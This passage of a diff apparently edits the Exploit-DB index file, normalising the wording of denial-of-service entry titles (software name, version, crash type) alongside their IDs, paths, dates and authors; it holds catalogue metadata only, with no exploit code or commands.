Buffer Overflow Denial of Service",2010-01-01,jacky,windows,dos,0 -10907,platforms/windows/dos/10907.pl,"VSO Medoa Player 1.0.2.2 - Local Denial of Services (PoC)",2010-01-02,SarBoT511,windows,dos,0 +10907,platforms/windows/dos/10907.pl,"VSO Medoa Player 1.0.2.2 - Local Denial of Service (PoC)",2010-01-02,SarBoT511,windows,dos,0 10908,platforms/windows/dos/10908.pl,"GOM player 2.1.9 - Local Crash (PoC)",2010-01-02,SarBoT511,windows,dos,0 10909,platforms/windows/dos/10909.pl,"MP4 Player 4.0 - Local Crash (PoC)",2010-01-02,SarBoT511,windows,dos,0 10920,platforms/windows/dos/10920.cpp,"VirtualDJ Trial 6.0.6 'New Year Edition' - '.m3u' Exploit",2010-01-02,"fl0 fl0w",windows,dos,0 @@ -1357,7 +1357,7 @@ id,file,description,date,author,platform,type,port 11217,platforms/windows/dos/11217.txt,"IntelliTamper 2.07/2.08 - (defer)Remote Buffer Overflow (PoC)",2010-01-21,SkuLL-HackeR,windows,dos,0 11227,platforms/windows/dos/11227.pl,"yPlay 1.0.76 - '.mp3' Local Crash (PoC)",2010-01-22,cr4wl3r,windows,dos,0 11228,platforms/windows/dos/11228.pl,"Pico MP3 Player 1.0 - '.mp3' / '.pls' Local Crash (PoC)",2010-01-22,cr4wl3r,windows,dos,0 -11233,platforms/windows/dos/11233.pl,"QtWeb 3.0 - Remote Denial of Service/Crash",2010-01-22,"Zer0 Thunder",windows,dos,0 +11233,platforms/windows/dos/11233.pl,"QtWeb 3.0 - Remote Crash (Denial of Service)",2010-01-22,"Zer0 Thunder",windows,dos,0 11234,platforms/windows/dos/11234.py,"Sonique2 2.0 Beta Build 103 - Local Crash (PoC)",2010-01-23,b0telh0,windows,dos,0 11245,platforms/windows/dos/11245.txt,"Mozilla Firefox 3.6 - (XML parser) Memory Corruption (PoC) / Denial of Service",2010-01-24,d3b4g,windows,dos,0 11247,platforms/windows/dos/11247.txt,"Opera 10.10 - (XML parser) Denial of Service (PoC)",2010-01-24,d3b4g,windows,dos,0 @@ -1387,7 +1387,7 @@ id,file,description,date,author,platform,type,port 11427,platforms/hardware/dos/11427.txt,"Nokia Symbian OS 3rd Edition - Multiple Web Browser Vulnerabilities",2010-02-12,"Nishant Das Patnaik",hardware,dos,0 11432,platforms/windows/dos/11432.txt,"Mozilla Firefox 3.6 - Denial of Service (1)",2010-02-13,"Asheesh kumar Mani Tripathi",windows,dos,0 11438,platforms/windows/dos/11438.txt,"Microsoft Internet Explorer 8 - Denial of Service",2010-02-13,"Asheesh kumar Mani Tripathi",windows,dos,0 -11451,platforms/windows/dos/11451.pl,"NovaPlayer 1.0 - '.mp3' Local Denial of Service (2)",2010-02-14,Mr.tro0oqy,windows,dos,0 +11451,platforms/windows/dos/11451.pl,"NovaPlayer 1.0 - '.mp3' File Local Denial of Service (2)",2010-02-14,Mr.tro0oqy,windows,dos,0 11467,platforms/ios/dos/11467.py,"iOS My DBLite Edition - Remote Denial of Service",2010-02-15,"Jason Bowes",ios,dos,0 11469,platforms/windows/dos/11469.py,"EasyFTP Server 1.7.0.2 - Authenticated Buffer Overflow (SEH) (PoC)",2010-02-15,loneferret,windows,dos,0 11470,platforms/windows/dos/11470.py,"EasyFTP Server 1.7.0.2 - Authenticated Buffer Overflow (PoC)",2010-02-15,loneferret,windows,dos,0 @@ -1430,7 +1430,7 @@ id,file,description,date,author,platform,type,port 11714,platforms/windows/dos/11714.py,"Mackeitone Media Player - '.m3u' Stack Buffer Overflow",2010-03-13,ITSecTeam,windows,dos,0 11717,platforms/multiple/dos/11717.php,"Multiple PHP Functions - Local Denial of Service Vulnerabilities",2010-03-13,"Yakir Wizman",multiple,dos,0 11724,platforms/windows/dos/11724.pl,"GOM Player 2.1.21 - '.avi' Denial of Service",2010-03-14,En|gma7,windows,dos,0 -11728,platforms/windows/dos/11728.pl,"Media Player 6.4.9.1 with K-Lite Codec Pack - '.avi' Denial of Service/Crash",2010-03-14,En|gma7,windows,dos,0 +11728,platforms/windows/dos/11728.pl,"Media Player 6.4.9.1 with K-Lite Codec Pack - '.avi' File Crash (Denial of Service)",2010-03-14,En|gma7,windows,dos,0 14367,platforms/multiple/dos/14367.txt,"Novell Groupwise Webaccess - Stack Overflow",2010-07-15,"Francis Provencher",multiple,dos,0 11734,platforms/windows/dos/11734.py,"httpdx 1.5.3b - Multiple Remote Unauthenticated Denial of Service (PoC)",2010-03-14,loneferret,windows,dos,0 11736,platforms/linux/dos/11736.py,"Kerio MailServer 6.2.2 - Unauthenticated Remote Denial of Service (PoC)",2006-12-14,"Evgeny Legerov",linux,dos,389 @@ -1440,9 +1440,9 @@ id,file,description,date,author,platform,type,port 11792,platforms/multiple/dos/11792.pl,"mplayer 4.4.1 - Null Pointer Dereference (PoC)",2010-03-18,"Pietro Oliva",multiple,dos,0 11803,platforms/windows/dos/11803.txt,"Crimson Editor - Overwrite (SEH)",2010-03-18,sharpe,windows,dos,0 11809,platforms/windows/dos/11809.py,"eDisplay Personal FTP Server 1.0.0 - Unauthenticated Denial of Service (PoC)",2010-03-19,loneferret,windows,dos,21 -11810,platforms/windows/dos/11810.py,"eDisplay Personal FTP Server 1.0.0 - Multiple Authenticated Crash SEH (PoC)",2010-03-19,loneferret,windows,dos,21 +11810,platforms/windows/dos/11810.py,"eDisplay Personal FTP Server 1.0.0 - Multiple Authenticated Crash (SEH) (PoC)",2010-03-19,loneferret,windows,dos,21 11827,platforms/windows/dos/11827.py,"no$gba 2.5c - '.nds' Local crash",2010-03-21,l3D,windows,dos,0 -11838,platforms/windows/dos/11838.php,"Apple Safari 4.0.5 - Object Tag 'JavaScriptCore.dll' Denial of Service (Crash)",2010-03-22,3lkt3F0k4,windows,dos,0 +11838,platforms/windows/dos/11838.php,"Apple Safari 4.0.5 - Object Tag 'JavaScriptCore.dll' Crash (Denial of Service)",2010-03-22,3lkt3F0k4,windows,dos,0 11839,platforms/windows/dos/11839.py,"Donar Player 2.2.0 - Local Crash (PoC)",2010-03-22,b0telh0,windows,dos,0 11842,platforms/windows/dos/11842.py,"freeSSHd 1.2.4 - Denial of Service",2010-03-22,Pi3rrot,windows,dos,0 11855,platforms/multiple/dos/11855.c,"Jinais IRC Server 0.1.8 - Null Pointer (PoC)",2010-03-23,"Salvatore Fresta",multiple,dos,0 @@ -1459,7 +1459,7 @@ id,file,description,date,author,platform,type,port 11966,platforms/windows/dos/11966.py,"Easy Icon Maker - '.ico' File Reading Crash",2010-03-30,ITSecTeam,windows,dos,0 11975,platforms/windows/dos/11975.rb,"Free MP3 CD Ripper 2.6 - '.wav' (PoC)",2010-03-30,"Richard leahy",windows,dos,0 11977,platforms/windows/dos/11977.pl,"CDTrustee - '.BAK' Local Crash (PoC)",2010-03-31,anonymous,windows,dos,0 -11984,platforms/windows/dos/11984.py,"Optimal Archive 1.38 - '.zip' SEH (PoC)",2010-03-31,TecR0c,windows,dos,0 +11984,platforms/windows/dos/11984.py,"Optimal Archive 1.38 - '.zip' File (SEH) (PoC)",2010-03-31,TecR0c,windows,dos,0 11985,platforms/windows/dos/11985.sh,"BitComet 1.19 - Remote Denial of Service",2010-03-31,"Pierre Nogues",windows,dos,0 11987,platforms/windows/dos/11987.txt,"Adobe Reader - Escape From '.PDF'",2010-03-31,"Didier Stevens",windows,dos,0 12000,platforms/windows/dos/12000.pl,"Kwik Pay Payroll 4.10.3 - '.mdb' Crash (PoC)",2010-04-01,anonymous,windows,dos,0 @@ -1494,8 +1494,8 @@ id,file,description,date,author,platform,type,port 12207,platforms/windows/dos/12207.html,"MagnetoSoft NetworkResources 4.0.0.5 - ActiveX NetShareEnum Overwrite (SEH) (PoC)",2010-04-13,s4squatch,windows,dos,0 12208,platforms/windows/dos/12208.html,"MagnetoSoft NetworkResources - ActiveX NetConnectionEnum Overwrite (SEH) (PoC)",2010-04-13,s4squatch,windows,dos,0 12217,platforms/multiple/dos/12217.py,"Aircrack-NG Tools svn r1675 - Remote Exploit",2010-04-14,"Lukas Lueg",multiple,dos,0 -12228,platforms/windows/dos/12228.py,"MovieLibrary 1.4.401 - Local Denial of Service (.dmv)",2010-04-14,anonymous,windows,dos,0 -12229,platforms/windows/dos/12229.py,"Book Library 1.4.162 - Local Denial of Service (.bkd)",2010-04-14,anonymous,windows,dos,0 +12228,platforms/windows/dos/12228.py,"MovieLibrary 1.4.401 - '.dmv' Local Denial of Service",2010-04-14,anonymous,windows,dos,0 +12229,platforms/windows/dos/12229.py,"Book Library 1.4.162 - '.bkd' Local Denial of Service",2010-04-14,anonymous,windows,dos,0 12240,platforms/windows/dos/12240.py,"Mocha LPD 1.9 - Remote Buffer Overflow Denial of Service (PoC)",2010-04-14,mr_me,windows,dos,0 15732,platforms/linux/dos/15732.txt,"FontForge - '.BDF' Font File Stack Based Buffer Overflow",2010-12-14,"Ulrik Persson",linux,dos,0 12243,platforms/windows/dos/12243.py,"RPM Select/Elite 5.0 - '.xml config parsing' Unicode Buffer Overflow (PoC)",2010-04-14,mr_me,windows,dos,0 @@ -1505,7 +1505,7 @@ id,file,description,date,author,platform,type,port 12273,platforms/windows/dos/12273.py,"Microsoft Windows 7/2008 R2 - SMB Client Trans2 Stack Overflow (MS10-020) (PoC)",2010-04-17,"laurent gaffie",windows,dos,0 12274,platforms/windows/dos/12274.py,"Multiple Vendor AgentX++ - Stack Buffer Overflow",2010-04-17,ZSploit.com,windows,dos,0 12294,platforms/windows/dos/12294.txt,"avtech software 'avc781viewer.dll' ActiveX - Multiple Vulnerabilities",2010-04-19,LiquidWorm,windows,dos,0 -12297,platforms/hardware/dos/12297.txt,"Huawei EchoLife HG520c - Denial of Service / Modem Reset",2010-04-19,hkm,hardware,dos,0 +12297,platforms/hardware/dos/12297.txt,"Huawei EchoLife HG520c - Modem Reset (Denial of Service)",2010-04-19,hkm,hardware,dos,0 12302,platforms/windows/dos/12302.html,"HP Operations Manager 8.16 - 'srcvw4.dll' LoadFile()/SaveFile() Remote Unicode Stack Overflow (PoC)",2010-04-20,mr_me,windows,dos,0 12314,platforms/windows/dos/12314.py,"Speed Commander 13.10 - '.zip' Memory Corruption",2010-04-20,TecR0c,windows,dos,0 12324,platforms/multiple/dos/12324.py,"Multiple Browsers - Audio Tag Denial of Service",2010-04-21,"Chase Higgins",multiple,dos,0 @@ -1514,7 +1514,7 @@ id,file,description,date,author,platform,type,port 12337,platforms/windows/dos/12337.c,"Microsoft Windows XP/2000/2003 - 'win32k.sys' SfnINSTRING Local kernel Denial of Service",2010-04-22,MJ0011,windows,dos,0 12341,platforms/windows/dos/12341.txt,"EDraw Flowchart ActiveX Control 2.3 - 'EDImage.ocx' Remote Denial of Service (IE)",2010-04-22,LiquidWorm,windows,dos,0 12344,platforms/hardware/dos/12344.txt,"Apple iPhone 3.1.2 - (7D11) Model MB702LL Mobile Safari Denial of Service",2010-04-19,"Matthew Bergin",hardware,dos,0 -12356,platforms/windows/dos/12356.c,"CommView 6.1 (Build 636) - Local Denial of Service (Blue Screen of Death)",2010-04-23,p4r4N0ID,windows,dos,0 +12356,platforms/windows/dos/12356.c,"CommView 6.1 (Build 636) - Local Blue Screen of Death (Denial of Service)",2010-04-23,p4r4N0ID,windows,dos,0 12375,platforms/osx/dos/12375.c,"Apple Mac OSX 10.6 - HFS File System Attack (Denial of Service)",2010-04-24,"Maksymilian Arciemowicz",osx,dos,0 12382,platforms/multiple/dos/12382.txt,"Invision Power Board - Denial of Service",2010-04-25,SeeMe,multiple,dos,0 12401,platforms/multiple/dos/12401.html,"WebKit 532.5 - Stack Exhaustion",2010-04-26,"Mathias Karlsson",multiple,dos,0 @@ -1570,7 +1570,7 @@ id,file,description,date,author,platform,type,port 12774,platforms/windows/dos/12774.py,"Home FTP Server 1.10.3 (build 144) - Denial of Service",2010-05-28,Dr_IDE,windows,dos,0 12775,platforms/multiple/dos/12775.py,"VideoLAN VLC Media Player 1.0.6 - '.avi' Media File Crash (PoC)",2010-05-28,Dr_IDE,multiple,dos,0 12816,platforms/windows/dos/12816.py,"ZipExplorer 7.0 - '.zar' Denial of Service",2010-05-31,TecR0c,windows,dos,0 -12852,platforms/windows/dos/12852.txt,"QtWeb 3.3 - Remote Denial of Service/Crash",2010-06-03,PoisonCode,windows,dos,0 +12852,platforms/windows/dos/12852.txt,"QtWeb 3.3 - Remote Crash (Denial of Service)",2010-06-03,PoisonCode,windows,dos,0 12853,platforms/windows/dos/12853.py,"Quick 'n Easy FTP Server Lite 3.1 - Exploit",2010-06-03,b0nd,windows,dos,0 40087,platforms/multiple/dos/40087.txt,"Adobe Flash - ATF Processing Overflow",2016-07-11,"Google Security Research",multiple,dos,0 40088,platforms/multiple/dos/40088.txt,"Adobe Flash - JXR Processing Double-Free",2016-07-11,"Google Security Research",multiple,dos,0 @@ -1602,7 +1602,7 @@ id,file,description,date,author,platform,type,port 13939,platforms/windows/dos/13939.pl,"Hacker Evolution Game: untold Mod Editor 2.00.001 - Buffer Overflow (PoC)",2010-06-19,gunslinger_,windows,dos,0 13958,platforms/windows/dos/13958.txt,"Sysax Multi Server < 5.25 (SFTP Module) - Multiple Commands Denial of Service Vulnerabilities",2010-06-21,leinakesi,windows,dos,0 13959,platforms/windows/dos/13959.c,"TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities",2010-06-21,"Luigi Auriemma",windows,dos,9987 -13965,platforms/windows/dos/13965.py,"Subtitle Translation Wizard 3.0.0 - SEH (PoC)",2010-06-22,blake,windows,dos,0 +13965,platforms/windows/dos/13965.py,"Subtitle Translation Wizard 3.0.0 - (SEH) (PoC)",2010-06-22,blake,windows,dos,0 14003,platforms/freebsd/dos/14003.c,"FreeBSD Kernel - mountnfs() Exploit",2010-06-23,"Patroklos Argyroudis",freebsd,dos,0 14010,platforms/novell/dos/14010.txt,"Novell iManager - Multiple Vulnerabilities",2010-06-24,"Core Security Technologies",novell,dos,48080 14012,platforms/multiple/dos/14012.txt,"Weborf HTTP Server - Denial of Service",2010-06-24,Crash,multiple,dos,80 @@ -1628,7 +1628,7 @@ id,file,description,date,author,platform,type,port 15307,platforms/windows/dos/15307.py,"HP Data Protector Media Operations 6.11 - HTTP Server Remote Integer Overflow Denial of Service",2010-10-23,d0lc3,windows,dos,0 14344,platforms/windows/dos/14344.c,"Corel WordPerfect Office X5 15.0.0.357 - 'wpd' Buffer Overflow (PoC)",2010-07-12,LiquidWorm,windows,dos,0 14346,platforms/windows/dos/14346.txt,"Corel Presentations X5 15.0.0.357 - 'shw' Buffer Preoccupation (PoC)",2010-07-12,LiquidWorm,windows,dos,0 -14349,platforms/windows/dos/14349.html,"Opera - Denial of Service by canvas Element",2010-07-12,"Pouya Daneshmand",windows,dos,0 +14349,platforms/windows/dos/14349.html,"Opera - Canvas Element (Denial of Service)",2010-07-12,"Pouya Daneshmand",windows,dos,0 14372,platforms/windows/dos/14372.txt,"Haihaisoft PDF Reader OCX Control 1.1.2.0 - Remote Buffer Overflow",2010-07-16,shinnai,windows,dos,0 14379,platforms/multiple/dos/14379.txt,"Novell Groupwise Internet Agent - Stack Overflow",2010-07-16,"Francis Provencher",multiple,dos,0 14380,platforms/windows/dos/14380.py,"Power/Personal FTP Server - RETR Denial of Service",2010-07-16,antrhacks,windows,dos,0 @@ -1738,7 +1738,7 @@ id,file,description,date,author,platform,type,port 15131,platforms/windows/dos/15131.txt,"Fox Audio Player 0.8.0 - '.m3u' Denial of Service",2010-09-27,4n0nym0us,windows,dos,0 15148,platforms/windows/dos/15148.txt,"Microsoft Excel - SxView Record Parsing Heap Memory Corruption",2010-09-29,Abysssec,windows,dos,0 15158,platforms/windows/dos/15158.py,"Microsoft Unicode Scripts Processor - Remote Code Execution (MS10-063)",2010-09-30,Abysssec,windows,dos,0 -15167,platforms/windows/dos/15167.txt,"Microsoft IIS 6.0 - ASP Stack Overflow (Stack Exhaustion) Denial of Service (MS10-065)",2010-10-01,kingcope,windows,dos,0 +15167,platforms/windows/dos/15167.txt,"Microsoft IIS 6.0 - ASP Stack Overflow Stack Exhaustion (Denial of Service) (MS10-065)",2010-10-01,kingcope,windows,dos,0 15188,platforms/ios/dos/15188.py,"iOS FileApp < 2.0 - FTP Remote Denial of Service",2010-10-02,m0ebiusc0de,ios,dos,0 15212,platforms/osx/dos/15212.txt,"Adobe Acrobat and Reader - Array Indexing Remote Code Execution",2010-10-06,"Knud and nSense",osx,dos,0 15214,platforms/win_x86/dos/15214.py,"HP Data Protector Media Operations - Null Pointer Dereference Remote Denial of Service",2010-10-06,d0lc3,win_x86,dos,19813 @@ -1860,7 +1860,7 @@ id,file,description,date,author,platform,type,port 15905,platforms/windows/dos/15905.py,"Xynph FTP Server 1.0 - USER Denial of Service",2011-01-04,freak_out,windows,dos,0 15925,platforms/windows/dos/15925.txt,"StageTracker 2.5 - Denial of Service",2011-01-07,freak_out,windows,dos,0 15935,platforms/linux/dos/15935.c,"GNU libc/regcomp(3) - Multiple Vulnerabilities",2011-01-07,"Maksymilian Arciemowicz",linux,dos,0 -15940,platforms/windows/dos/15940.pl,"HP Data Protector Manager 6.11 - Remote Denial of Service in RDS Service",2011-01-08,Pepelux,windows,dos,0 +15940,platforms/windows/dos/15940.pl,"HP Data Protector Manager 6.11 - RDS Service Remote Denial of Service",2011-01-08,Pepelux,windows,dos,0 15946,platforms/windows/dos/15946.py,"IrfanView 4.28 - Multiple Denial of Service Vulnerabilities",2011-01-09,BraniX,windows,dos,0 15959,platforms/windows/dos/15959.pl,"Macro Express Pro 4.2.2.1 - '.MXE' File Syntactic Analysis Buffer Overflow (PoC)",2011-01-10,LiquidWorm,windows,dos,0 15973,platforms/multiple/dos/15973.txt,"Wireshark - ZigBee ZCL Dissector Infinite Loop Denial of Service",2011-01-11,"Fred Fierling",multiple,dos,0 @@ -1877,13 +1877,13 @@ id,file,description,date,author,platform,type,port 16038,platforms/windows/dos/16038.py,"Inetserv 3.23 POP3 - Denial of Service",2011-01-24,dmnt,windows,dos,0 16040,platforms/windows/dos/16040.py,"Automated Solutions Modbus/TCP OPC Server - Remote Heap Corruption (PoC)",2011-01-25,"Jeremy Brown",windows,dos,0 16042,platforms/windows/dos/16042.rb,"Opera Web Browser 11.00 - Integer Overflow",2011-01-25,"C4SS!0 G0M3S",windows,dos,0 -16064,platforms/bsd/dos/16064.c,"FreeBSD 8.0 - Local Denial of Service (Forced Reboot)",2011-01-28,kingcope,bsd,dos,0 +16064,platforms/bsd/dos/16064.c,"FreeBSD 8.0 - Local Forced Reboot (Denial of Service)",2011-01-28,kingcope,bsd,dos,0 16068,platforms/hardware/dos/16068.pl,"Polycom SoundPoint IP Devices - Denial of Service",2011-01-28,"pawel gawinek",hardware,dos,0 16079,platforms/multiple/dos/16079.html,"Google Chrome 8.0.552.237 - replace Denial of Service",2011-01-30,"Carlos Mario Penagos Hollmann",multiple,dos,0 16084,platforms/windows/dos/16084.html,"Maxthon Browser 3.0.20.1000 - ref / replace Denial of Service",2011-01-30,"Carlos Mario Penagos Hollmann",windows,dos,0 16095,platforms/linux/dos/16095.pl,"Terminal Server Client - '.rdp' Denial of Service",2011-02-02,"D3V!L FUCKER",linux,dos,0 16108,platforms/multiple/dos/16108.txt,"VideoLAN VLC Media Player 1.1 - Subtitle StripTags() Function Memory Corruption",2011-02-03,"Harry Sintonen",multiple,dos,0 -16120,platforms/windows/dos/16120.py,"Hanso Player 1.4.0.0 - Buffer Overflow Denial of Service Skinfile",2011-02-06,badc0re,windows,dos,0 +16120,platforms/windows/dos/16120.py,"Hanso Player 1.4.0.0 - Buffer Overflow Skinfile (Denial of Service)",2011-02-06,badc0re,windows,dos,0 16121,platforms/windows/dos/16121.py,"Hanso Converter 1.1.0 - BufferOverflow Denial of Service",2011-02-06,badc0re,windows,dos,0 16129,platforms/linux/dos/16129.txt,"ProFTPd mod_sftp - Integer Overflow Denial of Service (PoC)",2011-02-07,kingcope,linux,dos,0 16166,platforms/windows/dos/16166.py,"Microsoft Windows Server 2003 - AD Unauthenticated BROWSER ELECTION Remote Heap Overflow",2011-02-14,Cupidon-3005,windows,dos,0 @@ -1999,7 +1999,7 @@ id,file,description,date,author,platform,type,port 17583,platforms/windows/dos/17583.txt,"Citrix XenApp / XenDesktop XML Service - Heap Corruption",2011-07-28,"n.runs AG",windows,dos,0 17601,platforms/windows/dos/17601.py,"Omnicom Alpha 4.0e LPD Server - Denial of Service",2011-08-03,"Craig Freyman",windows,dos,0 17610,platforms/multiple/dos/17610.py,"OpenSLP 1.2.1 / < 1647 trunk - Denial of Service",2011-08-05,"Nicolas Gregoire",multiple,dos,0 -17618,platforms/windows/dos/17618.py,"CiscoKits 1.0 - TFTP Server Denial of Service (Write command)",2011-08-05,"SecPod Research",windows,dos,0 +17618,platforms/windows/dos/17618.py,"CiscoKits 1.0 - TFTP Server 'Write Command' Denial of Service",2011-08-05,"SecPod Research",windows,dos,0 17620,platforms/windows/dos/17620.txt,"threedify designer 5.0.2 - Multiple Vulnerabilities",2011-08-05,"High-Tech Bridge SA",windows,dos,0 17638,platforms/windows/dos/17638.py,"LiteServe 2.81 - PASV Command Denial of Service",2011-08-08,"Craig Freyman",windows,dos,0 17642,platforms/windows/dos/17642.txt,"Acoustica Mixcraft 1.00 - Local Crash",2011-08-09,NassRawI,windows,dos,0 @@ -2007,14 +2007,14 @@ id,file,description,date,author,platform,type,port 17658,platforms/windows/dos/17658.py,"Simple HTTPd 1.42 - Denial of Servive Exploit",2011-08-12,G13,windows,dos,0 17664,platforms/windows/dos/17664.py,"NSHC Papyrus 2.0 - Heap Overflow",2011-08-13,wh1ant,windows,dos,0 17676,platforms/windows/dos/17676.py,"Notepad++ NppFTP plugin - LIST command Remote Heap Overflow (PoC)",2011-08-17,0in,windows,dos,0 -17696,platforms/multiple/dos/17696.pl,"Apache - Remote Denial of Service (Memory Exhaustion)",2011-08-19,kingcope,multiple,dos,0 +17696,platforms/multiple/dos/17696.pl,"Apache - Remote Memory Exhaustion (Denial of Service)",2011-08-19,kingcope,multiple,dos,0 17712,platforms/windows/dos/17712.txt,"Adobe Photoshop CS5 - '.gif' Remote Code Execution",2011-08-22,"Francis Provencher",windows,dos,0 17718,platforms/windows/dos/17718.pl,"Groovy Media Player 2.6.0 - '.m3u' Local Buffer Overflow (PoC)",2011-08-26,"D3r K0n!G",windows,dos,0 17742,platforms/windows/dos/17742.py,"Mini FTP Server 1.1 - Buffer Corruption Remote Denial of Service",2011-08-28,LiquidWorm,windows,dos,0 17769,platforms/linux/dos/17769.c,"Linux Kernel 3.0.0 - 'perf_count_sw_cpu_clock' event Denial of Service",2011-09-01,"Vince Weaver",linux,dos,0 17772,platforms/windows/dos/17772.txt,"BroadWin Webaccess Client - Multiple Vulnerabilities",2011-09-02,"Luigi Auriemma",windows,dos,0 17781,platforms/windows/dos/17781.pl,"World Of Warcraft - 'chat-cache.txt' Local Stack Overflow Denial of Service",2011-09-05,"BSOD Digital",windows,dos,0 -17785,platforms/windows/dos/17785.pl,"TOWeb 3.0 - Local Format String Denial of Service (TOWeb.MO file Corruption)",2011-09-05,"BSOD Digital",windows,dos,0 +17785,platforms/windows/dos/17785.pl,"TOWeb 3.0 - Local Format String Denial of Service 'TOWeb.MO' File Corruption",2011-09-05,"BSOD Digital",windows,dos,0 17795,platforms/windows/dos/17795.py,"Crush FTP 5 - 'APPE' command Remote JVM Blue Screen of Death (PoC)",2011-09-07,"BSOD Digital",windows,dos,0 17796,platforms/windows/dos/17796.txt,"Microsoft Windows Server 2008 R1 - Local Denial of Service",2011-09-07,Randomdude,windows,dos,0 21788,platforms/windows/dos/21788.pl,"FastStone Image Viewer 4.6 - ReadAVonIP Crash (PoC)",2012-10-07,"Jean Pascal Pereira",windows,dos,0 @@ -2068,7 +2068,7 @@ id,file,description,date,author,platform,type,port 40298,platforms/windows/dos/40298.py,"Goron WebServer 2.0 - Multiple Vulnerabilities",2016-08-29,"Guillaume Kaddouch",windows,dos,80 18028,platforms/windows/dos/18028.py,"zFTPServer - 'cwd/stat' Remote Denial of Service",2011-10-24,"Myo Soe",windows,dos,0 18029,platforms/windows/dos/18029.pl,"BlueZone - Malformed '.zft' File Local Denial of Service",2011-10-24,"Iolo Morganwg",windows,dos,0 -18030,platforms/windows/dos/18030.pl,"BlueZone Desktop Multiple - Malformed files Local Denial of Service Vulnerabilities",2011-10-25,Silent_Dream,windows,dos,0 +18030,platforms/windows/dos/18030.pl,"BlueZone Desktop Multiple - Malformed Files Local Denial of Service Vulnerabilities",2011-10-25,Silent_Dream,windows,dos,0 18049,platforms/windows/dos/18049.txt,"Microsys PROMOTIC 8.1.4 - ActiveX GetPromoticSite Unitialized Pointer",2011-10-13,"Luigi Auriemma",windows,dos,0 18052,platforms/windows/dos/18052.php,"Oracle DataDirect ODBC Drivers - HOST Attribute 'arsqls24.dll' Stack Based Buffer Overflow (PoC)",2011-10-31,rgod,windows,dos,0 18078,platforms/windows/dos/18078.txt,"Microsoft Excel 2003 11.8335.8333 - Use-After-Free",2011-11-04,"Luigi Auriemma",windows,dos,0 @@ -2086,7 +2086,7 @@ id,file,description,date,author,platform,type,port 18173,platforms/windows/dos/18173.pl,"Bugbear FlatOut 2005 - Malformed '.bed' File Buffer Overflow",2011-11-30,Silent_Dream,windows,dos,0 18188,platforms/windows/dos/18188.txt,"Hillstone Software HS TFTP Server 1.3.2 - Denial of Service",2011-12-02,"SecPod Research",windows,dos,0 18200,platforms/windows/dos/18200.txt,"SopCast 3.4.7 - 'sop://' URI Handling Remote Stack Buffer Overflow (PoC)",2011-12-05,LiquidWorm,windows,dos,0 -18196,platforms/windows/dos/18196.py,"NJStar Communicator MiniSmtp - Buffer Overflow [ASLR Bypass]",2011-12-03,Zune,windows,dos,0 +18196,platforms/windows/dos/18196.py,"NJStar Communicator MiniSmtp - Buffer Overflow (ASLR Bypass)",2011-12-03,Zune,windows,dos,0 18199,platforms/hardware/dos/18199.pl,"ShareCenter D-Link DNS-320 - Remote reboot/shutdown/reset (Denial of Service)",2011-12-05,rigan,hardware,dos,0 18220,platforms/windows/dos/18220.py,"CyberLink Multiple Products - File Project Handling Stack Buffer Overflow (PoC)",2011-12-09,modpr0be,windows,dos,0 18221,platforms/linux/dos/18221.c,"Apache - Denial of Service",2011-12-09,"Ramon de C Valle",linux,dos,0 @@ -2236,7 +2236,7 @@ id,file,description,date,author,platform,type,port 19098,platforms/multiple/dos/19098.txt,"Apple iTunes 10.6.1.7 - '.m3u' Playlist File Walking Heap Buffer Overflow",2012-06-13,LiquidWorm,multiple,dos,0 19385,platforms/windows/dos/19385.txt,"IrfanView 4.33 - '.DJVU' Image Processing Heap Overflow",2012-06-24,"Francis Provencher",windows,dos,0 19117,platforms/bsd/dos/19117.c,"Linux Kernel 2.0 / 2.1 (Digital UNIX 4.0 D / FreeBSD 2.2.4 / HP HP-UX 10.20/11.0 / IBM AIX 3.2.5 / NetBSD 1.2 / Solaris 2.5.1) - Smurf Denial of Service",1998-01-05,"T. Freak",bsd,dos,0 -19137,platforms/hardware/dos/19137.rb,"Wyse - Unauthenticated Machine Remote Power Off )Denial of Service) (Metasploit)",2012-06-14,it.solunium,hardware,dos,0 +19137,platforms/hardware/dos/19137.rb,"Wyse - Unauthenticated Machine Remote Power Off (Denial of Service) (Metasploit)",2012-06-14,it.solunium,hardware,dos,0 19413,platforms/windows/dos/19413.c,"Microsoft Windows 95/98 / NT Enterprise Server 4.0 SP5 / NT Terminal Server 4.0 SP4 / NT Workstation 4.0 SP5 - Denial of Service (1)",1999-07-03,Coolio,windows,dos,0 19391,platforms/windows/dos/19391.py,"Slimpdf Reader 1.0 - Memory Corruption",2012-06-25,"Carlos Mario Penagos Hollmann",windows,dos,0 19392,platforms/windows/dos/19392.py,"Able2Extract and Able2Extract Server 6.0 - Memory Corruption",2012-06-25,"Carlos Mario Penagos Hollmann",windows,dos,0 @@ -2264,7 +2264,7 @@ id,file,description,date,author,platform,type,port 19301,platforms/linux/dos/19301.c,"Linux Kernel 2.0.33 - IP Fragment Overlap",1998-04-17,"Michal Zalewski",linux,dos,0 19308,platforms/linux/dos/19308.c,"Linux Kernel 2.0 / 2.0.33 - i_count Overflow (PoC)",1998-01-14,"Aleph One",linux,dos,0 19410,platforms/windows/dos/19410.py,"Qbik WinGate 3.0/Pro 4.0.1/Standard 4.0.1 - Buffer Overflow Denial of Service",1999-02-22,Prizm,windows,dos,0 -19328,platforms/windows/dos/19328.txt,"Qutecom SoftPhone 2.2.1 - Heap Overflow Denial of Service/Crash (PoC)",2012-06-22,"Debasish Mandal",windows,dos,0 +19328,platforms/windows/dos/19328.txt,"Qutecom SoftPhone 2.2.1 - Heap Overflow Crash (Denial of Service) PoC)",2012-06-22,"Debasish Mandal",windows,dos,0 19331,platforms/windows/dos/19331.txt,"ACDSee PRO 5.1 - '.RLE' Image Processing Heap Overflow",2012-06-22,"Francis Provencher",windows,dos,0 19332,platforms/windows/dos/19332.txt,"ACDSee PRO 5.1 - '.PCT' Image Processing Heap Overflow",2012-06-22,"Francis Provencher",windows,dos,0 19333,platforms/windows/dos/19333.txt,"ACDSee PRO 5.1 - '.gif' Image Processing Heap Overflow",2012-06-22,"Francis Provencher",windows,dos,0 @@ -2290,7 +2290,7 @@ id,file,description,date,author,platform,type,port 19416,platforms/windows/dos/19416.c,"Netscape Enterprise Server 3.6 - SSL Buffer Overflow Denial of Service",1999-07-06,"Arne Vidstrom",windows,dos,0 19423,platforms/bsd/dos/19423.c,"Linux Kernel 2.3 (BSD/OS 4.0 / FreeBSD 3.2 / NetBSD 1.4) - Shared Memory Denial of Service",1999-07-15,"Mike Perry",bsd,dos,0 19436,platforms/hardware/dos/19436.txt,"Check Point Software Firewall-1 3.0/1 4.0 - Table Saturation Denial of Service",1999-07-29,"Lance 